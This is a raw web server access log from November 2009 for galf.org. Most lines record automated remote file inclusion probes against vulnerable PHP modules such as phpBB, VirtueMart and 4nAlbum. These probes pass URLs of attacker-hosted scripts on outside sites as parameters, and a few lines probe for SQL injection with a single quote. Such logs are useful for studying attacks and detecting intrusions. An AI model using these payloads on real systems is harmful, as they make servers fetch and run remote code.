94.236.23.242 - - [02/Nov/2009:04:22:07 -0800] "GET /logs/access_090504.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:22:07 -0800] "GET /logs/access_090817.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:22:07 -0800] "GET /logs/access_090803.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:22:07 -0800] "GET /logs/access_090615.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:04:26:57 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:04:26:57 -0800] "GET /logs/access_090420.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:04:26:57 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:04:27:10 -0800] "GET /logs/access_090316.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.222.23.217 - - [02/Nov/2009:04:29:17 -0800] "GET //modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://cleaningvesta.ru/themes/engines/phptemplate/uk1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:04:29:46 -0800] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:04:29:46 -0800] "GET /logs/access_090504.log//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:04:29:46 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.234 - - [02/Nov/2009:04:30:52 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.234 - - [02/Nov/2009:04:30:52 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.234 - - [02/Nov/2009:04:30:52 -0800] "GET /logs/access_091012.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:32:34 -0800] "GET /logs/access_090629.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:32:34 -0800] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:32:34 -0800] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [02/Nov/2009:04:32:35 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [02/Nov/2009:04:32:35 -0800] "GET /logs/access_090810.log//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [02/Nov/2009:04:32:35 -0800] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:32:39 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:32:50 -0800] "GET /logs/access_090914.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:32:58 -0800] "GET /logs/access_090907.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:33:04 -0800] "GET /logs/access_090928.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [02/Nov/2009:04:33:05 -0800] "GET /logs/access_090810.log//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [02/Nov/2009:04:33:05 -0800] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [02/Nov/2009:04:33:05 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:33:13 -0800] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [02/Nov/2009:04:33:17 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [02/Nov/2009:04:33:17 -0800] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [02/Nov/2009:04:33:23 -0800] "GET /logs/access_091012.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:27 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:28 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:28 -0800] "GET /logs/access_090622.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:33:34 -0800] "GET /logs/access_090309.log//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:33:34 -0800] "GET /header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:33:34 -0800] "GET /logs//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:33:36 -0800] "GET /logs/access_090309.log//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:33:36 -0800] "GET /header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:33:36 -0800] "GET /logs//header.php?abspath=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:37 -0800] "GET /logs/access_090504.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:45 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:46 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:46 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:46 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:33:50 -0800] "GET /logs/access_090622.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:33:54 -0800] "GET /logs/access_090427.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:34:43 -0800] "GET /logs/access_090629.log/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:34:43 -0800] "GET /logs/access_090713.log/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:34:48 -0800] "GET /logs/access_090504.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:34:48 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:34:48 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:34:51 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.118 - - [02/Nov/2009:04:35:37 -0800] "GET /logs/access_090511.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
94.198.53.208 - - [02/Nov/2009:04:36:05 -0800] "GET /logs/access_090615.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [02/Nov/2009:04:36:52 -0800] "GET /logs/access_090420.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:38:39 -0800] "GET /logs/access_091012.log//index.php?body=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:38:39 -0800] "GET /logs/access_091012.log//index.php?body=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:38:39 -0800] "GET /index.php?body=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:38:39 -0800] "GET /index.php?body=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:38:40 -0800] "GET /logs//index.php?body=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [02/Nov/2009:04:38:40 -0800] "GET /logs//index.php?body=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:04:39:05 -0800] "GET /logs/access_090420.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.230.210 - - [02/Nov/2009:04:41:23 -0800] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/4.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:41:43 -0800] "GET /logs/access_090504.log%20%20///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:41:43 -0800] "GET //modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:41:43 -0800] "GET /logs///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:41:48 -0800] "GET /logs/access_090504.log%20%20///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:41:48 -0800] "GET //modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:41:48 -0800] "GET /logs///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:42:04 -0800] "GET /logs/access_090504.log%20%20///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:42:04 -0800] "GET /logs///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:42:04 -0800] "GET //modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:42:12 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:42:13 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:42:13 -0800] "GET /logs/access_090309.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:42:16 -0800] "GET /logs/access_090622.log%20%20///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:42:22 -0800] "GET /logs/access_090622.log%20%20///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:42:32 -0800] "GET /logs/access_090622.log%20%20///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:42:50 -0800] "GET /logs/access_090601.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:35 -0800] "GET //modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:36 -0800] "GET /logs///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:36 -0800] "GET /logs/access_090316.log///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:40 -0800] "GET /logs/access_090622.log///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:42 -0800] "GET /logs/access_090316.log///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:42 -0800] "GET //modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:42 -0800] "GET /logs///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:47 -0800] "GET /logs/access_090622.log///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:57 -0800] "GET //modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:57 -0800] "GET /logs/access_090316.log///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:43:58 -0800] "GET /logs///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [02/Nov/2009:04:44:02 -0800] "GET /logs/access_090622.log///modules/4nAlbum/public/displayCategory.php?dir=http://farida.fileave.com/ok.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:04:44:20 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.99.2 - - [02/Nov/2009:04:44:20 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.99.2 - - [02/Nov/2009:04:44:20 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.109.72 - - [02/Nov/2009:04:46:51 -0800] "GET /logs/access_090330.log HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:04:46:51 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:04:46:51 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:04:46:52 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.98.47.66 - - [02/Nov/2009:04:47:53 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.98.47.66 - - [02/Nov/2009:04:47:53 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.98.47.66 - - [02/Nov/2009:04:47:53 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.192.251.146 - - [02/Nov/2009:04:49:00 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [02/Nov/2009:04:49:00 -0800] "GET /logs/access_090309.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [02/Nov/2009:04:49:00 -0800] "GET /logs/access_090323.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [02/Nov/2009:04:49:00 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [02/Nov/2009:04:49:31 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [02/Nov/2009:04:49:31 -0800] "GET /logs/access_090323.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [02/Nov/2009:04:49:31 -0800] "GET /logs/access_090309.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [02/Nov/2009:04:49:31 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rickardsrenovations.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [02/Nov/2009:04:50:23 -0800] "GET /logs///skin/happycast_category_deepblue/view.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [02/Nov/2009:04:50:24 -0800] "GET //skin/happycast_category_deepblue/view.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [02/Nov/2009:04:50:24 -0800] "GET /logs/access_090907.log///skin/happycast_category_deepblue/view.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:04:51:25 -0800] "GET /logs/access_090810.log//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [02/Nov/2009:04:51:30 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [02/Nov/2009:04:51:30 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [02/Nov/2009:04:51:30 -0800] "GET /logs/access_090323.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [02/Nov/2009:04:51:30 -0800] "GET /logs/access_090309.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:04:52:08 -0800] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
189.38.90.30 - - [02/Nov/2009:04:52:08 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
189.38.90.30 - - [02/Nov/2009:04:52:08 -0800] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
